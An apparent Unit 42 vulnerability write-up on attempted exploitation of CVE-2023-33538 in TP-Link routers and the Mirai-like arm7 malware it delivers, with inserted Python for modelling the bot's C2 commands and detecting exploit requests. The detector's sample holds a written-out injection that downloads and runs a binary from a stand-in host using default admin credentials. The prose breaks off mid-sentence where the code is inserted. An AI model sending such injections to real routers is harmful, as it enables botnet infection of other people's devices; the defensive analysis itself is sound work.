Source: Unit 42 | Category: Vulnerabilities | Severity: Critical

A Deep Dive Into Attempted Exploitation of CVE-2023-33538

CVE-2023-33538 (CVSS 8.8) is a command injection vulnerability affecting end-of-life TP-Link Wi-Fi router models, including the TL-WR940N, TL-WR740N, and TL-WR841N series. Successful exploitation requires authentication to the router's web interface and can lead to remote code execution, with observed in-the-wild attempts delivering Mirai-like botnet payloads. As these devices are end-of-life, no vendor patches are available; the recommended mitigation is to replace the hardware and ensure default credentials are changed.

By: Asher Davila, Malav Vyas, Chris Navarrete
Published: April 16, 2026
Categories: Threat Research, Vulnerabilities
Tags: Botnet, Command injection, CVE-2023-33538, Mirai, WiFi routers

Executive Summary

We identified active, automated scans and probes attempting to exploit CVE-2023-33538, a vulnerability in several end-of-life TP-Link Wi-Fi router models:

- TL-WR940N v2 and v4
- TL-WR740N v1 and v2
- TL-WR841N v8 and v10

The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices. We observed this activity after the Cybersecurity and Infrastructure Security Agency's (CISA) June 2025 addition of this CVE (Common Vulnerabilities and Exposures) to its Known Exploited Vulnerabilities (KEV) Catalog.

There has been some discussion of how impactful (or not) these active campaigns might have been. To address this, we conducted a deep-dive investigation by emulating the TP-Link TL-WR940N router. Using firmware emulation and reverse engineering, we analyzed whether the specific exploits observed in our telemetry could successfully use this vulnerability to deliver the payload on that device model.
During our investigation, we uncovered two important facts about the attempted exploitation of this vulnerability:

- Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real.
- Successful exploitation requires authentication to the router's web interface.

This research demonstrates that while active botnet attacks leverage flawed exploit code, the underlying vulnerability remains a practical infection vector due to the widespread use of default internet of things (IoT) credentials.

TP-Link gave the following recommendation regarding the devices and vulnerability in question:

"We confirm that the affected TP-Link devices are end-of-life, and no vendor patches are available. Our recommendation to customers is to replace these units with supported hardware and ensure that default credentials are not used."

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products and services:

- Advanced URL Filtering and Advanced DNS Security
- Advanced WildFire
- Cortex Xpanse
- Device Security
- Next-Generation Firewall with Advanced Threat Prevention

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Technical Analysis of Attempted Exploitation of CVE-2023-33538

CVE-2023-33538 was publicly reported in June 2023, affecting the aforementioned end-of-life TP-Link routers. Proof-of-concept (PoC) exploits for the different routers appeared earlier that month. The PoC exploits were removed from their original GitHub post but can be retrieved via the Web Archive. According to the report, the /userRpm/WlanNetworkRpm endpoint contains a vulnerability in processing the ssid1 parameter sent through an HTTP GET request, because the parameter value is not sanitized when the Wi-Fi router processes it.
Consequently, an attacker could send commands to this parameter. This would allow remote attackers to submit special requests, resulting in command injection and theoretically leading to arbitrary system command execution on the Wi-Fi router.

Our Telemetry Findings

Our telemetry systems detected active, large-scale exploitation attempts for CVE-2023-33538 around the time of the addition to the KEV catalog in June 2025. We observed multiple exploitation attempts similar to the example shown below in Figure 1.

Figure 1. An example of an exploit attempt for CVE-2023-33538 that we observed in May 2025.

These were GET requests toward the /userRpm/WlanNetworkRpm.htm endpoint, attempting to execute multiple commands in the ssid parameter:

- The first command uses wget to download an Executable and Linkable Format (ELF) binary named arm7 from the IP address 51.38.137[.]113 into the /tmp directory.
- The next command executes chmod 777 on the arm7 binary to grant the file read, write and execute permissions.
- The last command executes the saved binary at /tmp/arm7 with the parameter tplink.

This set of commands is commonly associated with botnets, such as Mirai. These HTTP GET requests use Basic Authentication with the admin:admin credential encoded in Base64 (YWRtaW46YWRtaW4= as shown in Figure 1).

Malware Downloaded

The arm7 binary found in our telemetry appears to be a Mirai variant. It is similar to the one used in the Condi IoT botnet, with multiple examples of the string condi in the file's code. Figure 2 shows an example of code from the arm7 binary showing the string condi2.

Figure 2. More references to Condi are present in the arm7 binary.

In the main function's command processing loop, the arm7 binary waits for specific command sequences. The commands are received through the network socket connection. The data is stored in the buffer var_868 from the fd_serv function, which is the command-and-control (C2) server socket, as shown in Figure 3.

Figure 3. Connection and command buffer of the arm7 binary shown in Radare2.

After receiving data, the arm7 binary checks for specific byte patterns described below in Table 1.

Command Sequence    Purpose               Action
0x99 0x66 0x33      Heartbeat Response    Sends encrypted status string to C2
0x99 0x66 0x66      Lockdown/Termination  Sets lockdown flag, exits if already set
0x33 0x66 0x99      HTTP Server Status    Reports HTTP server status (only if running)
0x33 0x66 0x33      Conditional Update    Downloads all top1hbt.* binaries (only if the HTTP server is active)
0x33 0x66 0x66      HTTP Server Start     Starts HTTP server on random port (1024–64511)
0x66 0x66 0x99      Lockdown Flag         Sets termination preparation flag

Table 1. Control commands for the arm7 binary.

Binary Update Mechanism

When the binary updates itself, it first calls the update_bins("top1hbt.arm") function as shown in Figure 4.

Figure 4. Full update routine in the arm7 binary, as shown in Binary Ninja's decompiler.

For the update, the arm7 binary iterates through an arch_names array, which contains a total of eight additional architectures (e.g., top1hbt.arm6, top1hbt.mips) and updates accordingly. For each update, the arm7 binary:

- Removes any previously existing file
- Connects to the C2 server
- Sends HTTP GET requests
- Downloads a fresh malware binary

The update_bins() function contains the IP address and port hard-coded, as observed in disassembled code from the arm7 binary shown in Figures 5 and 6.

Figure 5. The update_bins function with a hard-coded IP address and port from the arm7 binary as shown in Binary Ninja.

In Figure 5, the value 0x71892633 in little-endian corresponds to the IP address 51.38.137[.]113, and 0x5000 in little-endian corresponds to TCP port 80. Figure 6 shows the same IP address and port presented as \x00\x50 for TCP port 80 and \x33\x26\x89\x71 for 51.38.137[.]113.

Figure 6. Hard-coded IP address and port in the update_bins function (Disassembly View) showing the malware's C2 server details.
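The following Python is an added analysis aid, not code from the Unit 42 write-up or from the malware: it models the dispatcher in Table 1 as a small state machine an analyst can replay captured C2 frames against, and decodes the little-endian immediates from Figure 5 into the host and port named in the text. The flag and action names are this model's own assumptions.

```python
import random
import socket
import struct

# Added analysis model, not the malware's code: sequences and effects follow Table 1 of
# the write-up; the flag and action names below are this model's own.
C2_COMMANDS = {
    b"\x99\x66\x33": "heartbeat",
    b"\x99\x66\x66": "lockdown",
    b"\x33\x66\x99": "httpd_status",
    b"\x33\x66\x33": "conditional_update",
    b"\x33\x66\x66": "httpd_start",
    b"\x66\x66\x99": "lockdown_flag",
}

class DispatcherModel:
    def __init__(self, rng=None):
        self.lockdown = self.termination_prep = self.httpd_started = False
        self.httpd_port = None
        self.rng = rng or random.Random(0)

    def handle(self, data):
        """Return the action a bot in this state would take for one received frame."""
        cmd = C2_COMMANDS.get(bytes(data[:3]), "unknown")
        if cmd == "heartbeat":
            return "send-encrypted-status"
        if cmd == "lockdown":
            if self.lockdown:
                return "exit"
            self.lockdown = True
            return "lockdown-set"
        if cmd == "httpd_status":
            return "report-httpd-status" if self.httpd_started else "ignored"
        if cmd == "conditional_update":
            return "download-top1hbt-binaries" if self.httpd_started else "ignored"
        if cmd == "httpd_start" and not self.httpd_started:
            self.httpd_port = self.rng.randint(1024, 64511)  # port range given in Table 1
            self.httpd_started = True
            return "httpd-start:%d" % self.httpd_port
        if cmd == "lockdown_flag":
            self.termination_prep = True
            return "termination-prep-flag-set"
        return "ignored" if cmd == "httpd_start" else "unknown"

def decode_hardcoded_endpoint(ip_word, port_half):
    ip = socket.inet_ntoa(struct.pack("<I", ip_word))            # 0x71892633 -> 33 26 89 71
    port = struct.unpack(">H", struct.pack("<H", port_half))[0]  # 0x5000 -> 00 50 -> 80
    return ip, port
```

decode_hardcoded_endpoint(0x71892633, 0x5000) reproduces the 51.38.137[.]113:80 pair the article reads off Figures 5 and 6.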
The arm7 binary communicates with the C2 server at 51.38.137[.]113, which also hosts the binary itself. This IP address is also associated with the domain cnc.vietdediserver[.]shop, a known malicious domain associated with Mirai-like botnet campaigns.

HTTP Server Start

As part of the botnet, a host infected with the arm7 binary will act as a web server, which requires starting the HTTP daemon, httpd. For this HTTP server start procedure, the arm7 binary checks whether the httpd_started flag is not set, meaning the httpd_start() function shown in Figure 7 has not been executed.

Figure 7. HTTP server start function of the arm7 binary as shown in Binary Ninja's decompiler.

If httpd_started is not set, the process generates a random value between 1024 and 65535 to use as a TCP port. It then calls httpd_start() to fork child processes. After that, the arm7 binary binds the TCP port number to a socket, listens for connections and performs a full binary update. When this happens, the process sets the httpd_started flag value to 1. Finally, as an HTTP server, the infected botnet host serves malware binaries to requesting clients, which are other compromised devices.

When the httpd_start() function is executed, it first forks a child process that immediately downloads fresh malware binaries for eight different CPU architectures, as shown in the function graph in Figure 8.

Figure 8. httpd_start() function graph for the arm7 binary as shown in Binary Ninja.

After successfully retrieving updated malware binaries from the server at 51.38.137[.]113 and storing them locally, the process establishes an HTTP server on a randomly assigned port. The process then creates a listening socket that accepts incoming connections from other devices on the network. Although we were unable to retrieve updated malware files from the original C2 server, we observed other samples with the same top1hbt prefix from other C2 servers.
CVE-2023-33538 Exploit Analysis

As noted earlier, the exploit attempts to compromise a vulnerable TP-Link device and infect it with the arm7 version, similar to the malware binary shown below in Figure 9.

Figure 9. CVE-2023-33538 exploit attempt.

The exploit attempt appears to contain errors. While the endpoint /userRpm/WlanNetworkRpm.htm is correct, this exploit is incorrectly attempting to inject malicious commands into the ssid parameter. The actual vulnerable parameter reported on the target system is ssid1. To reproduce and analyze the vulnerability, we acquired the TP-Link WR940N US V4
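To turn the request shape described in the telemetry and exploit-analysis sections into a check over logged requests, here is an added Python detector (not tooling from the article): it flags GETs to the vulnerable endpoint whose ssid1 or ssid value carries shell syntax, separates the flawed ssid variant seen in telemetry from a probe against the actually vulnerable ssid1, and notes whether the Basic Authentication header carries admin:admin. The sample requests are constructed and use 192.0.2.10 as a stand-in payload host.

```python
import base64
from urllib.parse import unquote_plus, urlsplit

# Added detection helper, not tooling from the article. Samples are constructed request
# targets plus their Authorization header; 192.0.2.10 (TEST-NET-1) stands in for the payload host.
VULN_PATHS = {"/userRpm/WlanNetworkRpm", "/userRpm/WlanNetworkRpm.htm"}
INJECTION_MARKERS = ("`", ";", "|", "&&", "$(", "wget ", "chmod ", "/tmp/")
DEFAULT_CREDS = {"admin:admin"}
SAMPLES = {
    # shape of the in-the-wild attempt: wget/chmod/exec chain in ssid, admin:admin
    "observed": ("/userRpm/WlanNetworkRpm.htm?ssid=x;wget+http://192.0.2.10/arm7+-O+/tmp/arm7;"
                 "chmod+777+/tmp/arm7;/tmp/arm7+tplink", "Basic YWRtaW46YWRtaW4="),
    # probe against the parameter the original report names as vulnerable, non-default creds
    "ssid1": ("/userRpm/WlanNetworkRpm?ssid1=x;echo+probe", "Basic dXNlcjpTMy1yYW5kb20="),
    # ordinary SSID change by an administrator
    "benign": ("/userRpm/WlanNetworkRpm.htm?ssid=HomeNet&Save=Save", "Basic dXNlcjpTMy1yYW5kb20="),
}


def query_params(query):
    """Decode the query by hand so a ';' inside a value is never treated as a pair separator."""
    params = {}
    for pair in query.split("&") if query else []:
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def uses_default_creds(authorization):
    if not authorization.lower().startswith("basic "):
        return False
    try:
        creds = base64.b64decode(authorization[6:], validate=True).decode("utf-8", "replace")
    except ValueError:  # malformed Base64 is not a credential match
        return False
    return creds in DEFAULT_CREDS


def classify(target, authorization=""):
    """Return (verdict, injected parameter or None, default-credential flag) for one GET."""
    url = urlsplit(target)
    if url.path not in VULN_PATHS:
        return "off-target", None, False
    params = query_params(url.query)
    injected = next((p for p in ("ssid1", "ssid")
                     if any(m in v for v in params.get(p, []) for m in INJECTION_MARKERS)), None)
    verdict = {"ssid1": "exploit-attempt", "ssid": "malformed-exploit-attempt"}.get(injected, "clean")
    return verdict, injected, uses_default_creds(authorization)
```

Run over real access or proxy logs, the verdict distinguishes the failing ssid attempts the article describes from traffic that targets ssid1, and the credential flag shows which devices are still answering to admin:admin.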